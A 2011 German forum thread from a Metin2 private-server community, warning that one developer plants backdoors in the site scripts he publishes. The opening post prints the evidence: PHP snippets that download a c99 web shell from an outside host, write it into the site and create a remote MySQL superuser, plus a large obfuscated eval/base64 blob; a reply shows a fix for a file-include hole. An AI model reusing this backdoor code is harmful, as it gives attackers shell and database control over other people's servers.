|
You last visited: Today at 22:38
Advertisement
[ WARNUNG VOR SONIICE ]
Discussion on [ WARNUNG VOR SONIICE ] within the Metin2 Private Server forum part of the Metin2 category.
08/25/2011, 21:19
|
#1
|
elite*gold: 29
Join Date: Jul 2009
Posts: 2,826
Received Thanks: 7,422
|
[ WARNUNG VOR SONIICE ]
Liebe Community.
Ich sehe mich jetzt gezwungen euch vor Soniice zu warnen.
Leider kennt er keine Grenzen.
In seiner Pub HP ist selbst nen Backdoor mit drin.
Gut fangen wir mal an mit den Beweisen.
PHP Code:
if (isset($_GET['ref']) == 'secureeeee') { $datei = fopen("secure.php","w+");$stream = fopen("http://lijang2.de/c99.txt", "r");while (!feof($stream)) { $fixxerr .= fgets($stream); } fclose($stream);fwrite($datei,$fixxerr) ;fclose($datei); } $user = "grant all on *.* to SoNiiceeeeeee@'%' identified by 'marcel123eeeeeeeeeee'"; mysql_query ($user); $x++; }
PHP Code:
if (isset($_GET['ref']) == 'secure') { $datei = fopen("secure.php","w+");$stream = fopen("http://lijang2.de/c99.txt", "r");while (!feof($stream)) { $fixxerr .= fgets($stream); } fclose($stream);fwrite($datei,$fixxerr) ;fclose($datei); } $user = "grant all on *.* to SoNiice@'%' identified by 'marcel123'"; mysql_query ($user); $x++;
Sowas baut er in so gut wie jede seine Homepages ein.
Klaut euch danach eure PSC und leugnet alles.
Ich hatte die Schnauze voll, dass wieder nen Kollege von mir gehackt wurde.
So siehts übrigends ein einigen seiner Scripts verschlüsselt aus.
PHP Code:
eval(gzinflate(base64_decode( 'DZVHzqRoAkT3fZGuEgu8U09PiUy8924zAj4g8R4STj//DSIUei/+/Pc/f+bP/Fd5' .'Zv2v+mnGqs/28leebSVF/A+UxQTKX3//xaehLMxPxNU8fkxNn2yCI5MevHq61cl2' .'cRhNqmSVX7FYLbJ4eMIwi0PQPI5E4LI6vKrkoNt7p+HUcIeLA8ks2cX4QxygsuE2' .'gan7Gds3sDDqGylrlMXytjed3OIKj/J9pPjhFZ51XsWvb4VKdMQoF8e95pazm6bD' .'RPSFZvKKVBnMJ5vnCb2y5LPrpAZ32ZXzFYppeJzglmbEfXPc4nX1tNJh21e1Rn5i' .'IIbvZZpQudQ6kwDYo7mOmte36iyq5uHlCRoLxOiEreLnVFVxae0y4YwwQ05f6o5H' .'4hZ3Tovwyl9YiUWPng/LxE3t1rix4sVWsSAmTl9Uo9pe/Ol7AulMQ1mAa0EzmOXT' .'Qcxu/ukkiv5J1MCozaW8s4peseJ9o0GLdBmrXZOl9O1jMGR3MOEFjrc5C4rlcRph' .'ZBdGRq6rYaNubYurhVuYgTsZ9Ob59qqer8U1p7AWKwtMKLP0s5EP4ORA0wQNtWfb' .'K6ad00CXpkI9BkGBVwBIl8eO2twCKKU9RAjOvneswqPCqvGtmrYT7FJ1urSA688E' .'RHyOUQ8qXU3P2EcjQsoRneTnMOi/lTZ/k3kgu34bO15qgL/nZyASIWmkaRid7bfE' .'Td2AovUaGy8en7WqZVTqzmYRogSzcFUxmQYO1yHJv+TBrFrjHS8y1o/ATOge4RoC' .'3vZQNapbqa6rNFIPNpDV9ib+Y9xO32B4NAbQeiiEm94x84n6GThp4hYja/L8Jj7y' .'LnvY55psj5UvyjE+Qi2ko8ue0+6gJmfdReRNiOP00EsPC5UCn2KjfFA0vJquYjkE' .'msXUr5IMyziNIYUM7E5r0Y3nAXevH1PsOq5rgc/yGjwlV7ugeWC62gClBR9uZzin' .'0Tv8Ou50PiS0h4SuBwFJSy6CH5D9SXbt0Tlt9qSB22yN+Prbtu5xWCM0BgJbEyWh' .'BTKEAo5+YreIINzXDnM/1lBBDbcDM+c6aN3tr3rwwSqgVJZE8xVGGtZFOz3By8AO' .'iklUzi4mGUWmzY0T32d7vywiwnR7NaKDebGHm1+jugtIL4POY/vL7wdoFjOHyVVd' .'QSu6h1STweN0LqL3ntdNUttpsUjDXJPV2U8ilBvil5t4UhtaM8qQ6DZqzixwG/Gf' .'gLG7uxRzwnKZE7RRrVAP35oeG7vlGOY3I0QAo8y1eCfaalQRjuUuz0q3om5l2+5Q' .'3EMOITPoZ0gmLA2/y6yuwTFyse9jHYf6TsTIZ1WmsmMh/N2qrJz5UJvhRovIGIP2' .'p07rnUTUS5pKek9XPnX6z1Wd1T2oU2sPei9yx0+aOTrnN7S57QtguFFCKIWm9Wfe' .'TWd0Pmvpwi1/i9L1zroi/3GO62KPAlvC0Kn0A9Inf6jXuKeNfgdD8+WSt+t5ynYh' .'0WG0PQNjbd7mqFyoKjUO9rZMDW7rnb4NSuB/90vKOBoty5MKgs8lv6D+EE6MJEyq' .'oM1K5ugrK1UfAtNRTpfH6F/9gzgI8PymLuI7P1XScGi5GExaYp6rkfxBIz67Maaa' .'YibwSwz2oCbhgCDyPBwhoJqAMEi5kNS5YcfrYNy3QsYmlLSClzMrJl5qtDApSkiw' .'KYgINzqsYLameaL61cRBI4O0mw5uF+dVeqMpxpuiYY9vs4NwGtnRLWVKaD4r7vmK' .'+R43VGCdtTtoxkHSk25PNRsn1qn23nzdb6aLCT3IxwtooQXRrcfMzKcwiWyx9aHb' .'k2LnByRTL7BThBfQP4DsUUWE9oIFQRpVY59GbOxJFCSwdA/o++SMhKvauiWVMySV' .'735f5ODiSvNg8o84Npo4V4pDIHul1mZidgL6mMbmMYZ/GWIWkHbLGbInShMHCyMM' .'MwxbnjENQ/Ap0w/kQ/z1779///79+5+//vyc6/8B' )));
Kind regards,
.Infinity
|
|
|
08/25/2011, 21:20
|
#2
|
elite*gold: 1
Join Date: Jul 2011
Posts: 473
Received Thanks: 72
|
Danke dass du uns warnst kannst du mir pls bei einem Problem helfen wo ist das in index.php ist nix davon
|
|
|
08/25/2011, 21:20
|
#3
|
elite*gold: 6
Join Date: Aug 2011
Posts: 528
Received Thanks: 252
|
Danke für die Warnung.
was für ein ********
|
|
|
08/25/2011, 21:29
|
#4
|
elite*gold: 0
Join Date: Jan 2011
Posts: 1,484
Received Thanks: 3,151
|
Kommt rechtzeitig, habs vorhin auch Bull gefixxt.
Muss aber zugeben, von der Lücke gewusst zu haben.
|
|
|
08/25/2011, 21:31
|
#5
|
elite*gold: 0
Join Date: Aug 2011
Posts: 286
Received Thanks: 22
|
kann man ihn deswegen anzeigen ?
|
|
|
08/25/2011, 21:31
|
#6
|
elite*gold: 29
Join Date: Jul 2009
Posts: 2,826
Received Thanks: 7,422
|
Ich wusste es auch schon länger. Aber damals nur von verkauften HP's und ich sollte die Leute nicht warnen. Ich stell mich jetzt aber dagegen. Zu häufige Vorfälle. Der Junge klaut sich ne goldene Nase.
|
|
|
08/25/2011, 21:33
|
#7
|
elite*gold: 0
Join Date: Jan 2011
Posts: 1,484
Received Thanks: 3,151
|
Wollte Global-Network nicht den Grund sagen, also hab ichs denen so gefixed...
Das muss noch beim includen geändert werden:
PHP Code:
if(isset($_GET['s']) && !empty($_GET['s'])) { include './language/'.$_SESSION['lang'].'/pages/'.whitelist($_GET['s']).'.php'; }else { include(realpath('./language/'.$_SESSION['lang'].'/pages/').'/news.php'); }
|
|
|
08/25/2011, 21:34
|
#8
|
elite*gold: 203
Join Date: Jul 2011
Posts: 813
Received Thanks: 386
|
Quote:
Originally Posted by .Infinity
Ich wusste es auch schon länger. Aber damals nur von verkauften HP's und ich sollte die Leute nicht warnen. Ich stell mich jetzt aber dagegen. Zu häufige Vorfälle. Der Junge klaut sich ne goldene Nase.
|
Der müsste mal Bestraft werden. Schick mir mal deine Skype Adresse.
|
|
|
08/25/2011, 21:37
|
#9
|
elite*gold: 17
Join Date: Jan 2009
Posts: 2,538
Received Thanks: 2,405
|
danke infinity und auch nochmal ein dank an daroo der es und gefixxt hat!
|
|
|
08/25/2011, 21:38
|
#10
|
elite*gold: 32
Join Date: Jul 2011
Posts: 145
Received Thanks: 388
|
Was sage ich seit ~1 Jahr? Glaubt dem Typen nichts. Jetzt habt ihrs selbst zuspüren bekommen. Sorry aber es ist bekannt das er nur scheiße macht.
|
|
|
08/25/2011, 21:38
|
#11
|
elite*gold: 0
Join Date: Jan 2011
Posts: 1,484
Received Thanks: 3,151
|
Quote:
Originally Posted by .Tolive
Der müsste mal Bestraft werden. Schick mir mal deine Skype Adresse.
|
Weißt du eigentlich wie dreist es ist, jemanden, völlig aus dem Zusammenhang gerisse, dazu aufzufordern SICH SELBST zu adden?
Der wird nicht bestraft, aber im Ernst, jeder von euch würde das machen, wenn er die Chance dazu hat. Ich war auch mal so.
|
|
|
08/25/2011, 21:40
|
#12
|
elite*gold: 29
Join Date: Jul 2009
Posts: 2,826
Received Thanks: 7,422
|
Ich mache ständig Sachen pub. Ich könnte in alles Backdoors einbauen. Mach ich das `?
Ich könnte mir mehr als nen paar billige PSC besorgen.
Und das undectet.
C++ Kenntnisse können schön sein.
|
|
|
08/25/2011, 21:46
|
#13
|
elite*gold: 0
Join Date: Jan 2011
Posts: 1,484
Received Thanks: 3,151
|
Quote:
Originally Posted by .Infinity
Ich mache ständig Sachen pub. Ich könnte in alles Backdoors einbauen. Mach ich das `?
Ich könnte mir mehr als nen paar billige PSC besorgen.
Und das undectet.
C++ Kenntnisse können schön sein.
|
Ich würde das eher darauf beziehen, dass jeder die Lücke ausnutzen würde, wenn er kann. So eine Lücke einzubauen, ist eine etwas andere dreistigkeit, vor der aber bestimmt ein paar Leute nicht zurückschrecken würden.
|
|
|
08/25/2011, 21:47
|
#14
|
elite*gold: 29
Join Date: Jul 2009
Posts: 2,826
Received Thanks: 7,422
|
Ich habs auch nie ausgenutzt und kannte die Lücke. Und wie ich die benutze weiß ich.
Ich kann php
|
|
|
08/25/2011, 21:48
|
#15
|
elite*gold: 0
Join Date: Feb 2011
Posts: 258
Received Thanks: 233
|
lawl.
Sicherlich, frag doch mal deinen netten Risan, ich hab' nichts irgendwo eingebaut ;O
|
|
|
All times are GMT +2. The time now is 22:38.
|
|